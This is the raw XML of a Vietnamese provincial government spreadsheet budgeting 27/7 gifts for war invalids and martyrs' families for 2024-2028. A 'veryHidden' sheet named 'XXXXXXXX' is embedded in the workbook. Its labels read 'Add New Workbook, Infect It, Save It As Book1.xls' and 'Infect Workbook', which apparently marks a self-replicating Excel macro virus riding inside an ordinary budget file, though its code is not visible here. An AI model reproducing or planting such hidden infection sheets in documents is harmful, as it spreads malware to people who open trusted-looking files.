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580" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="XXXXXXXX" sheetId="1" state="veryHidden" r:id="rId1"/>
    <sheet name="27-7" sheetId="2" r:id="rId2"/>
    <sheet name="Sheet1" sheetId="3" r:id="rId3"/>
    <sheet name="Sheet2" sheetId="4" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Print_Titles" localSheetId="1">'27-7'!$4:$5</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="53" uniqueCount="44">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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       **</t>
  </si>
  <si>
    <t>**Set Our Values and Paths**</t>
  </si>
  <si>
    <t>**Add New Workbook, Infect It, Save It As Book1.xls**</t>
  </si>
  <si>
    <t>**Infect Workbook**</t>
  </si>
  <si>
    <t>TONG SO TIEN QUA.xls</t>
  </si>
  <si>
    <t>Nội dung</t>
  </si>
  <si>
    <t>I</t>
  </si>
  <si>
    <t>II</t>
  </si>
  <si>
    <t>STT</t>
  </si>
  <si>
    <t>Người có công với cách mạng</t>
  </si>
  <si>
    <t>Người thờ cúng liệt sĩ</t>
  </si>
  <si>
    <t xml:space="preserve">Các đoàn của lãnh  đạo tỉnh tổ chức đi thăm và tặng quà </t>
  </si>
  <si>
    <t>Thương binh hiện đang công tác tại các LLVT do Công an và BCHQS tỉnh Đồng Nai quản lý và chi trả trợ cấp hàng tháng</t>
  </si>
  <si>
    <t>Thương binh, bệnh binh đã được xếp hạng có hồ sơ do sở lao động -TBXH quản lý (trừ TB đang công tác ở những doanh nghiệp có hưởng lương).</t>
  </si>
  <si>
    <r>
      <t>CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM
Đ</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u val="single"/>
        <sz val="14"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>ộc lập- Tự do - Hạnh phú</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">c
</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">       ỦY BAN NHÂN DÂN
         T</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u val="single"/>
        <sz val="14"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>ỈNH ĐỒNG N</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>AI</t>
    </r>
  </si>
  <si>
    <t>Phụ lục số: 01</t>
  </si>
  <si>
    <t>Năm 2024</t>
  </si>
  <si>
    <t>Năm 2025</t>
  </si>
  <si>
    <t>Năm 2026</t>
  </si>
  <si>
    <t>Năm 2027</t>
  </si>
  <si>
    <t>Năm 2028</t>
  </si>
  <si>
    <t>Số người</t>
  </si>
  <si>
    <t>Mức quà</t>
  </si>
  <si>
    <t>Mức quà 
tặng
(đồng)</t>
  </si>
  <si>
    <t>Tổng cộng: I+II</t>
  </si>
  <si>
    <t>Tổng số người và kinh phí thực hiện giai đoạn
 (2024-2028)</t>
  </si>
  <si>
    <t>Kinh phí 
thực hiện
(đồng)</t>
  </si>
  <si>
    <t>Kinh phí
 thực hiện
(đồng)</t>
  </si>
  <si>
    <t>Tổng cộng (I)</t>
  </si>
  <si>
    <t>Tổng cộng (II)</t>
  </si>
  <si>
    <t xml:space="preserve">Người hoạt động kháng chiến bị nhiễm CĐHH  đang hưởng trợ cấp hàng tháng. </t>
  </si>
  <si>
    <t xml:space="preserve">Đại diện thân nhân liệt sĩ </t>
  </si>
  <si>
    <t>1.1</t>
  </si>
  <si>
    <t>1.2</t>
  </si>
  <si>
    <t>1.3</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">
 QUY ĐỊNH ĐỐI TƯỢNG, MỨC QUÀ TẶNG VÀ DỰ KIẾN KINH PHÍ THĂM,
 TẶNG QUÀ NGÀY THƯƠNG BINH -LIỆT SĨ (27/7), GIAI ĐOẠN (2024-2028)
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="14"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>(Ban hành kèm theo Báo cáo số:          /BC-UBND ngày         tháng        năm 2024 của UBND tỉnh Đồng Nai)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</si>
</sst>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#.##0"/>
    <numFmt numFmtId="183" formatCode="_(* #.##0_);_(* \(#.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name val="VNI-Times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0" xfId="15" applyFont="1" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="15">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="33" borderId="0" xfId="15" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="34" borderId="10" xfId="15" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="35" borderId="11" xfId="15" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="36" borderId="12" xfId="15" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="35" borderId="12" xfId="15" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="35" borderId="13" xfId="15" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="34" borderId="14" xfId="15" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="34" borderId="15" xfId="15" applyFill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/>
    </xf>
    <xf numFmtId="0" fontId="5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3" fontId="12" fillId="0" borderId="16" xfId="0" applyNumberFormat="1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3" fontId="13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6" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="13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horizontal="justify" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="12" fillId="0" borderId="16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7" fillId="37" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="3" fontId="12" fillId="37" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="3" fontId="13" fillId="37" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="3" fontId="13" fillId="37" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="13" fillId="37" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="3" fontId="14" fillId="37" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="37" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="37" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="37" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" quotePrefix="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="37" borderId="0" xfId="0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0" fillId="0" borderId="1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37" borderId="14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 wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="50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4.25"/>
  <cols>
    <col min="1" max="1" width="26.09765625" style="2" customWidth="1"/>
    <col min="2" max="2" width="1.1015625" style="2" customWidth="1"/>
    <col min="3" max="3" width="28.09765625" style="2" customWidth="1"/>
    <col min="4" max="16384" width="8" style="2" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="16.5">
      <c r="A1" s="1" t="e">
        <v>#REF!</v>
      </c>
      <c r="C1" s="13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spans="1:3" ht="16.5">
      <c r="A4" s="3" t="e">
        <v>#REF!</v>
      </c>
      <c r="C4" s="13"/>
    </row>
    <row r="5" ht="16.5">
      <c r="C5" s="13"/>
    </row>
    <row r="6" ht="17.25" thickBot="1">
      <c r="C6" s="13"/>
    </row>
    <row r="7" spans="1:3" ht="16.5">
      <c r="A7" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C7" s="13"/>
    </row>
    <row r="8" spans="1:3" ht="16.5">
      <c r="A8" s="6" t="s">
        <v>3</v>
      </c>
      <c r="C8" s="13"/>
    </row>
    <row r="9" spans="1:3" ht="16.5">
      <c r="A9" s="7" t="s">
        <v>4</v>
      </c>
      <c r="C9" s="13"/>
    </row>
    <row r="10" spans="1:3" ht="16.5">
      <c r="A10" s="6" t="s">
        <v>5</v>
      </c>
      <c r="C10" s="13"/>
    </row>
    <row r="11" spans="1:3" ht="17.25" thickBot="1">
      <c r="A11" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C11" s="13"/>
    </row>
    <row r="12" ht="16.5">
      <c r="C12" s="13"/>
    </row>
    <row r="13" ht="17.25" thickBot="1">
      <c r="C13" s="13"/>
    </row>
    <row r="14" spans="1:3" ht="17.25" thickBot="1">
      <c r="A14" s="4" t="s">
        <v>7</v>
      </c>
      <c r="C14" s="13"/>
    </row>
    <row r="15" ht="16.5">
      <c r="A15" s="13"/>
    </row>
    <row r="16" ht="17.25" thickBot="1">
      <c r="A16" s="13"/>
    </row>
    <row r="17" spans="1:3" ht="17.25" thickBot="1">
      <c r="A17" s="13"/>
      <c r="C17" s="4" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="18" ht="16.5">
      <c r="C18" s="13"/>
    </row>
    <row r="19" ht="16.5">
      <c r="C19" s="13"/>
    </row>
    <row r="20" spans="1:3" ht="16.5">
      <c r="A20" s="9" t="s">
        <v>9</v>
      </c>
      <c r="C20" s="13"/>
    </row>
    <row r="21" spans="1:3" ht="16.5">
      <c r="A21" s="13"/>
      <c r="C21" s="13"/>
    </row>
    <row r="22" spans="1:3" ht="16.5">
      <c r="A22" s="13"/>
      <c r="C22" s="13"/>
    </row>
    <row r="23" spans="1:3" ht="16.5">
      <c r="A23" s="13"/>
      <c r="C23" s="13"/>
    </row>
    <row r="24" ht="16.5">
      <c r="A24" s="13"/>
    </row>
    <row r="25" ht="16.5">
      <c r="A25" s="13"/>
    </row>
    <row r="26" spans="1:3" ht="17.25" thickBot="1">
      <c r="A26" s="13"/>
      <c r="C26" s="10" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="16.5">
      <c r="A27" s="13"/>
      <c r="C27" s="13"/>
    </row>
    <row r="28" spans="1:3" ht="16.5">
      <c r="A28" s="13"/>
      <c r="C28" s="13"/>
    </row>
    <row r="29" spans="1:3" ht="16.5">
      <c r="A29" s="13"/>
      <c r="C29" s="13"/>
    </row>
    <row r="30" spans="1:3" ht="16.5">
      <c r="A30" s="13"/>
      <c r="C30" s="13"/>
    </row>
    <row r="31" spans="1:3" ht="16.5">
      <c r="A31" s="13"/>
      <c r="C31" s="13"/>
    </row>
    <row r="32" spans="1:3" ht="16.5">
      <c r="A32" s="13"/>
      <c r="C32" s="13"/>
    </row>
    <row r="33" spans="1:3" ht="16.5">
      <c r="A33" s="13"/>
      <c r="C33" s="13"/>
    </row>
    <row r="34" spans="1:3" ht="16.5">
      <c r="A34" s="13"/>
      <c r="C34" s="13"/>
    </row>
    <row r="35" spans="1:3" ht="16.5">
      <c r="A35" s="13"/>
      <c r="C35" s="13"/>
    </row>
    <row r="36" spans="1:3" ht="16.5">
      <c r="A36" s="13"/>
      <c r="C36" s="13"/>
    </row>
    <row r="37" ht="16.5">
      <c r="A37" s="13"/>
    </row>
    <row r="38" ht="16.5">
      <c r="A38" s="13"/>
    </row>
    <row r="39" spans="1:3" ht="16.5">
      <c r="A39" s="13"/>
      <c r="C39" s="13"/>
    </row>
    <row r="40" spans="1:3" ht="16.5">
      <c r="A40" s="13"/>
      <c r="C40" s="13"/>
    </row>
    <row r="41" spans="1:3" ht="16.5">
      <c r="A41" s="13"/>
      <c r="C41" s="1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K14" sqref="K14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.796875" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="5" style="22" customWidth="1"/>
    <col min="2" max="2" width="25.8984375" style="11" customWidth="1"/>
    <col min="3" max="3" width="10.59765625" style="40" customWidth="1"/>
    <col min="4" max="4" width="11.69921875" style="21" customWidth="1"/>
    <col min="5" max="5" width="14.59765625" style="21" customWidth="1"/>
    <col min="6" max="6" width="10.3984375" style="21" customWidth="1"/>
    <col min="7" max="7" width="14.8984375" style="21" customWidth="1"/>
    <col min="8" max="8" width="12.19921875" style="21" customWidth="1"/>
    <col min="9" max="9" width="14.19921875" style="21" customWidth="1"/>
    <col min="10" max="10" width="12.59765625" style="21" customWidth="1"/>
    <col min="11" max="11" width="15.19921875" style="21" customWidth="1"/>
    <col min="12" max="12" width="13.5" style="21" customWidth="1"/>
    <col min="13" max="13" width="14.3984375" style="21" customWidth="1"/>
    <col min="14" max="14" width="10" style="21" customWidth="1"/>
    <col min="15" max="15" width="15.19921875" style="21" customWidth="1"/>
    <col min="16" max="17" width="9" style="16" customWidth="1"/>
    <col min="18" max="18" width="40.59765625" style="16" customWidth="1"/>
    <col min="19" max="21" width="9" style="16" customWidth="1"/>
    <col min="22" max="16384" width="9" style="11" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="18.75">
      <c r="O1" s="23" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="2" spans="1:15" ht="62.25" customHeight="1">
      <c r="A2" s="50" t="s">
        <v>22</v>
      </c>
      <c r="B2" s="50"/>
      <c r="C2" s="51" t="s">
        <v>21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2"/>
    </row>
    <row r="3" spans="1:18" ht="81.7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7"/>
      <c r="Q3" s="17"/>
      <c r="R3" s="17"/>
    </row>
    <row r="4" spans="1:15" ht="63" customHeight="1">
      <c r="A4" s="60" t="s">
        <v>15</v>
      </c>
      <c r="B4" s="60" t="s">
        <v>12</v>
      </c>
      <c r="C4" s="62" t="s">
        <v>31</v>
      </c>
      <c r="D4" s="53" t="s">
        <v>24</v>
      </c>
      <c r="E4" s="53"/>
      <c r="F4" s="53" t="s">
        <v>25</v>
      </c>
      <c r="G4" s="53"/>
      <c r="H4" s="53" t="s">
        <v>26</v>
      </c>
      <c r="I4" s="53"/>
      <c r="J4" s="53" t="s">
        <v>27</v>
      </c>
      <c r="K4" s="53"/>
      <c r="L4" s="53" t="s">
        <v>28</v>
      </c>
      <c r="M4" s="53"/>
      <c r="N4" s="55" t="s">
        <v>33</v>
      </c>
      <c r="O4" s="56"/>
    </row>
    <row r="5" spans="1:15" ht="47.25">
      <c r="A5" s="61"/>
      <c r="B5" s="61"/>
      <c r="C5" s="63"/>
      <c r="D5" s="24" t="s">
        <v>29</v>
      </c>
      <c r="E5" s="24" t="s">
        <v>34</v>
      </c>
      <c r="F5" s="24" t="s">
        <v>29</v>
      </c>
      <c r="G5" s="24" t="s">
        <v>35</v>
      </c>
      <c r="H5" s="24" t="s">
        <v>29</v>
      </c>
      <c r="I5" s="24" t="s">
        <v>35</v>
      </c>
      <c r="J5" s="24" t="s">
        <v>29</v>
      </c>
      <c r="K5" s="24" t="s">
        <v>35</v>
      </c>
      <c r="L5" s="24" t="s">
        <v>29</v>
      </c>
      <c r="M5" s="24" t="s">
        <v>35</v>
      </c>
      <c r="N5" s="24" t="s">
        <v>29</v>
      </c>
      <c r="O5" s="24" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="6" spans="1:21" s="14" customFormat="1" ht="24" customHeight="1">
      <c r="A6" s="25" t="s">
        <v>13</v>
      </c>
      <c r="B6" s="26" t="s">
        <v>30</v>
      </c>
      <c r="C6" s="41">
        <v>700000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8"/>
      <c r="Q6" s="18"/>
      <c r="R6" s="18"/>
      <c r="S6" s="18"/>
      <c r="T6" s="18"/>
      <c r="U6" s="18"/>
    </row>
    <row r="7" spans="1:21" s="14" customFormat="1" ht="18.75">
      <c r="A7" s="25">
        <v>1</v>
      </c>
      <c r="B7" s="26" t="s">
        <v>16</v>
      </c>
      <c r="C7" s="41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  <c r="Q7" s="18"/>
      <c r="R7" s="18"/>
      <c r="S7" s="18"/>
      <c r="T7" s="18"/>
      <c r="U7" s="18"/>
    </row>
    <row r="8" spans="1:15" ht="48" customHeight="1">
      <c r="A8" s="27" t="s">
        <v>40</v>
      </c>
      <c r="B8" s="28" t="s">
        <v>38</v>
      </c>
      <c r="C8" s="42"/>
      <c r="D8" s="29">
        <v>987</v>
      </c>
      <c r="E8" s="29">
        <f>D8*700000</f>
        <v>690900000</v>
      </c>
      <c r="F8" s="29">
        <f>987+25</f>
        <v>1012</v>
      </c>
      <c r="G8" s="29">
        <f>F8*700000</f>
        <v>708400000</v>
      </c>
      <c r="H8" s="29">
        <f>F8+30</f>
        <v>1042</v>
      </c>
      <c r="I8" s="29">
        <f>H8*700000</f>
        <v>729400000</v>
      </c>
      <c r="J8" s="29">
        <f>H8+30</f>
        <v>1072</v>
      </c>
      <c r="K8" s="29">
        <f>J8*700000</f>
        <v>750400000</v>
      </c>
      <c r="L8" s="29">
        <f>J8+30</f>
        <v>1102</v>
      </c>
      <c r="M8" s="30">
        <f>L8*700000</f>
        <v>771400000</v>
      </c>
      <c r="N8" s="29">
        <f>D8+F8+H8+J8+L8</f>
        <v>5215</v>
      </c>
      <c r="O8" s="29">
        <f>E8+G8+I8+K8+M8</f>
        <v>3650500000</v>
      </c>
    </row>
    <row r="9" spans="1:15" ht="78.75">
      <c r="A9" s="27" t="s">
        <v>41</v>
      </c>
      <c r="B9" s="31" t="s">
        <v>20</v>
      </c>
      <c r="C9" s="43"/>
      <c r="D9" s="32">
        <v>5750</v>
      </c>
      <c r="E9" s="29">
        <f>D9*700000</f>
        <v>4025000000</v>
      </c>
      <c r="F9" s="32">
        <v>5830</v>
      </c>
      <c r="G9" s="29">
        <f>F9*700000</f>
        <v>4081000000</v>
      </c>
      <c r="H9" s="32">
        <v>5930</v>
      </c>
      <c r="I9" s="29">
        <f>H9*700000</f>
        <v>4151000000</v>
      </c>
      <c r="J9" s="32">
        <v>5630</v>
      </c>
      <c r="K9" s="29">
        <f>J9*700000</f>
        <v>3941000000</v>
      </c>
      <c r="L9" s="32">
        <v>5730</v>
      </c>
      <c r="M9" s="30">
        <f>L9*700000</f>
        <v>4011000000</v>
      </c>
      <c r="N9" s="29">
        <f aca="true" t="shared" si="0" ref="N9:N14">D9+F9+H9+J9+L9</f>
        <v>28870</v>
      </c>
      <c r="O9" s="29">
        <f aca="true" t="shared" si="1" ref="O9:O14">E9+G9+I9+K9+M9</f>
        <v>20209000000</v>
      </c>
    </row>
    <row r="10" spans="1:15" ht="67.5" customHeight="1">
      <c r="A10" s="27" t="s">
        <v>42</v>
      </c>
      <c r="B10" s="28" t="s">
        <v>19</v>
      </c>
      <c r="C10" s="44"/>
      <c r="D10" s="30">
        <v>6</v>
      </c>
      <c r="E10" s="29">
        <f>D10*700000</f>
        <v>4200000</v>
      </c>
      <c r="F10" s="30">
        <v>8</v>
      </c>
      <c r="G10" s="29">
        <f>F10*700000</f>
        <v>5600000</v>
      </c>
      <c r="H10" s="30">
        <v>10</v>
      </c>
      <c r="I10" s="29">
        <f>H10*700000</f>
        <v>7000000</v>
      </c>
      <c r="J10" s="30">
        <v>12</v>
      </c>
      <c r="K10" s="29">
        <f>J10*700000</f>
        <v>8400000</v>
      </c>
      <c r="L10" s="30">
        <v>14</v>
      </c>
      <c r="M10" s="30">
        <f>L10*700000</f>
        <v>9800000</v>
      </c>
      <c r="N10" s="29">
        <f t="shared" si="0"/>
        <v>50</v>
      </c>
      <c r="O10" s="29">
        <f t="shared" si="1"/>
        <v>35000000</v>
      </c>
    </row>
    <row r="11" spans="1:15" ht="18.75">
      <c r="A11" s="25">
        <v>2</v>
      </c>
      <c r="B11" s="33" t="s">
        <v>39</v>
      </c>
      <c r="C11" s="42"/>
      <c r="D11" s="29">
        <v>1800</v>
      </c>
      <c r="E11" s="29">
        <f>D11*700000</f>
        <v>1260000000</v>
      </c>
      <c r="F11" s="29">
        <v>1750</v>
      </c>
      <c r="G11" s="29">
        <f>F11*700000</f>
        <v>1225000000</v>
      </c>
      <c r="H11" s="29">
        <v>1700</v>
      </c>
      <c r="I11" s="29">
        <f>H11*700000</f>
        <v>1190000000</v>
      </c>
      <c r="J11" s="29">
        <v>1650</v>
      </c>
      <c r="K11" s="29">
        <f>J11*700000</f>
        <v>1155000000</v>
      </c>
      <c r="L11" s="29">
        <v>1600</v>
      </c>
      <c r="M11" s="30">
        <f>L11*700000</f>
        <v>1120000000</v>
      </c>
      <c r="N11" s="29">
        <f t="shared" si="0"/>
        <v>8500</v>
      </c>
      <c r="O11" s="29">
        <f t="shared" si="1"/>
        <v>5950000000</v>
      </c>
    </row>
    <row r="12" spans="1:15" ht="18.75">
      <c r="A12" s="25">
        <v>3</v>
      </c>
      <c r="B12" s="33" t="s">
        <v>17</v>
      </c>
      <c r="C12" s="42"/>
      <c r="D12" s="29">
        <v>6900</v>
      </c>
      <c r="E12" s="29">
        <f>D12*700000</f>
        <v>4830000000</v>
      </c>
      <c r="F12" s="29">
        <v>7100</v>
      </c>
      <c r="G12" s="29">
        <f>F12*700000</f>
        <v>4970000000</v>
      </c>
      <c r="H12" s="29">
        <v>7300</v>
      </c>
      <c r="I12" s="29">
        <f>H12*700000</f>
        <v>5110000000</v>
      </c>
      <c r="J12" s="29">
        <v>7500</v>
      </c>
      <c r="K12" s="29">
        <f>J12*700000</f>
        <v>5250000000</v>
      </c>
      <c r="L12" s="29">
        <v>7700</v>
      </c>
      <c r="M12" s="30">
        <f>L12*700000</f>
        <v>5390000000</v>
      </c>
      <c r="N12" s="29">
        <f t="shared" si="0"/>
        <v>36500</v>
      </c>
      <c r="O12" s="29">
        <f t="shared" si="1"/>
        <v>25550000000</v>
      </c>
    </row>
    <row r="13" spans="1:15" ht="18.75">
      <c r="A13" s="54" t="s">
        <v>36</v>
      </c>
      <c r="B13" s="54"/>
      <c r="C13" s="42"/>
      <c r="D13" s="34">
        <f>SUM(D8:D12)</f>
        <v>15443</v>
      </c>
      <c r="E13" s="34">
        <f aca="true" t="shared" si="2" ref="E13:M13">SUM(E8:E12)</f>
        <v>10810100000</v>
      </c>
      <c r="F13" s="34">
        <f t="shared" si="2"/>
        <v>15700</v>
      </c>
      <c r="G13" s="34">
        <f t="shared" si="2"/>
        <v>10990000000</v>
      </c>
      <c r="H13" s="34">
        <f t="shared" si="2"/>
        <v>15982</v>
      </c>
      <c r="I13" s="34">
        <f t="shared" si="2"/>
        <v>11187400000</v>
      </c>
      <c r="J13" s="34">
        <f t="shared" si="2"/>
        <v>15864</v>
      </c>
      <c r="K13" s="34">
        <f t="shared" si="2"/>
        <v>11104800000</v>
      </c>
      <c r="L13" s="34">
        <f t="shared" si="2"/>
        <v>16146</v>
      </c>
      <c r="M13" s="34">
        <f t="shared" si="2"/>
        <v>11302200000</v>
      </c>
      <c r="N13" s="34">
        <f>SUM(N8:N12)</f>
        <v>79135</v>
      </c>
      <c r="O13" s="34">
        <f>SUM(O8:O12)</f>
        <v>55394500000</v>
      </c>
    </row>
    <row r="14" spans="1:15" ht="31.5">
      <c r="A14" s="25" t="s">
        <v>14</v>
      </c>
      <c r="B14" s="33" t="s">
        <v>18</v>
      </c>
      <c r="C14" s="42">
        <v>3000000</v>
      </c>
      <c r="D14" s="29">
        <v>10</v>
      </c>
      <c r="E14" s="29">
        <v>30000000</v>
      </c>
      <c r="F14" s="29">
        <v>10</v>
      </c>
      <c r="G14" s="29">
        <v>30000000</v>
      </c>
      <c r="H14" s="29">
        <v>10</v>
      </c>
      <c r="I14" s="29">
        <v>30000000</v>
      </c>
      <c r="J14" s="29">
        <v>10</v>
      </c>
      <c r="K14" s="29">
        <v>30000000</v>
      </c>
      <c r="L14" s="29">
        <v>10</v>
      </c>
      <c r="M14" s="29">
        <v>30000000</v>
      </c>
      <c r="N14" s="29">
        <f t="shared" si="0"/>
        <v>50</v>
      </c>
      <c r="O14" s="29">
        <v>30000000</v>
      </c>
    </row>
    <row r="15" spans="1:15" ht="18.75">
      <c r="A15" s="58" t="s">
        <v>37</v>
      </c>
      <c r="B15" s="58"/>
      <c r="C15" s="45"/>
      <c r="D15" s="34">
        <v>10</v>
      </c>
      <c r="E15" s="29">
        <v>30000000</v>
      </c>
      <c r="F15" s="34">
        <v>10</v>
      </c>
      <c r="G15" s="29">
        <v>30000000</v>
      </c>
      <c r="H15" s="34">
        <f>H14</f>
        <v>10</v>
      </c>
      <c r="I15" s="34">
        <f>I14</f>
        <v>30000000</v>
      </c>
      <c r="J15" s="34">
        <f aca="true" t="shared" si="3" ref="J15:O15">J14</f>
        <v>10</v>
      </c>
      <c r="K15" s="34">
        <f t="shared" si="3"/>
        <v>30000000</v>
      </c>
      <c r="L15" s="34">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
      <c r="M15" s="34">
        <f t="shared" si="3"/>
        <v>30000000</v>
      </c>
      <c r="N15" s="34">
        <f t="shared" si="3"/>
        <v>50</v>
      </c>
      <c r="O15" s="34">
        <f t="shared" si="3"/>
        <v>30000000</v>
      </c>
    </row>
    <row r="16" spans="1:21" s="14" customFormat="1" ht="18.75">
      <c r="A16" s="25"/>
      <c r="B16" s="35" t="s">
        <v>32</v>
      </c>
      <c r="C16" s="46"/>
      <c r="D16" s="36">
        <f>D13+D15</f>
        <v>15453</v>
      </c>
      <c r="E16" s="36">
        <f aca="true" t="shared" si="4" ref="E16:O16">E13+E15</f>
        <v>10840100000</v>
      </c>
      <c r="F16" s="36">
        <f t="shared" si="4"/>
        <v>15710</v>
      </c>
      <c r="G16" s="36">
        <f t="shared" si="4"/>
        <v>11020000000</v>
      </c>
      <c r="H16" s="36">
        <f t="shared" si="4"/>
        <v>15992</v>
      </c>
      <c r="I16" s="36">
        <f t="shared" si="4"/>
        <v>11217400000</v>
      </c>
      <c r="J16" s="36">
        <f t="shared" si="4"/>
        <v>15874</v>
      </c>
      <c r="K16" s="36">
        <f t="shared" si="4"/>
        <v>11134800000</v>
      </c>
      <c r="L16" s="36">
        <f t="shared" si="4"/>
        <v>16156</v>
      </c>
      <c r="M16" s="36">
        <f t="shared" si="4"/>
        <v>11332200000</v>
      </c>
      <c r="N16" s="36">
        <f t="shared" si="4"/>
        <v>79185</v>
      </c>
      <c r="O16" s="36">
        <f t="shared" si="4"/>
        <v>55424500000</v>
      </c>
      <c r="P16" s="18"/>
      <c r="Q16" s="18"/>
      <c r="R16" s="18"/>
      <c r="S16" s="18"/>
      <c r="T16" s="18"/>
      <c r="U16" s="18"/>
    </row>
    <row r="17" spans="1:21" s="14" customFormat="1" ht="18.75">
      <c r="A17" s="37"/>
      <c r="B17" s="38"/>
      <c r="C17" s="4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8"/>
      <c r="Q17" s="18"/>
      <c r="R17" s="18"/>
      <c r="S17" s="18"/>
      <c r="T17" s="18"/>
      <c r="U17" s="18"/>
    </row>
    <row r="18" spans="1:15" s="16" customFormat="1" ht="18.75">
      <c r="A18" s="22"/>
      <c r="B18" s="14"/>
      <c r="C18" s="4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6" customFormat="1" ht="18.75">
      <c r="A19" s="22"/>
      <c r="B19" s="12"/>
      <c r="C19" s="4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16" customFormat="1" ht="18.75">
      <c r="A20" s="22"/>
      <c r="B20" s="12"/>
      <c r="C20" s="4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16" customFormat="1" ht="18.75">
      <c r="A21" s="22"/>
      <c r="B21" s="14"/>
      <c r="C21" s="4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s="16" customFormat="1" ht="18.75">
      <c r="A22" s="22"/>
      <c r="B22" s="12"/>
      <c r="C22" s="4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16" customFormat="1" ht="18.75">
      <c r="A23" s="22"/>
      <c r="B23" s="12"/>
      <c r="C23" s="4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s="16" customFormat="1" ht="78" customHeight="1">
      <c r="A24" s="2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15" s="16" customFormat="1" ht="18.75">
      <c r="A25" s="22"/>
      <c r="B25" s="12"/>
      <c r="C25" s="4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s="16" customFormat="1" ht="18.75">
      <c r="A26" s="22"/>
      <c r="B26" s="12"/>
      <c r="C26" s="4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16" customFormat="1" ht="18.75">
      <c r="A27" s="22"/>
      <c r="B27" s="15"/>
      <c r="C27" s="4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</sheetData>
  <sheetProtection/>
  <mergeCells count="15">
    <mergeCell ref="A15:B15"/>
    <mergeCell ref="B24:O24"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="C2:O2"/>
    <mergeCell ref="D4:E4"/>
    <mergeCell ref="F4:G4"/>
    <mergeCell ref="H4:I4"/>
    <mergeCell ref="A13:B13"/>
    <mergeCell ref="N4:O4"/>
    <mergeCell ref="J4:K4"/>
    <mergeCell ref="L4:M4"/>
    <mergeCell ref="A3:O3"/>
  </mergeCells>
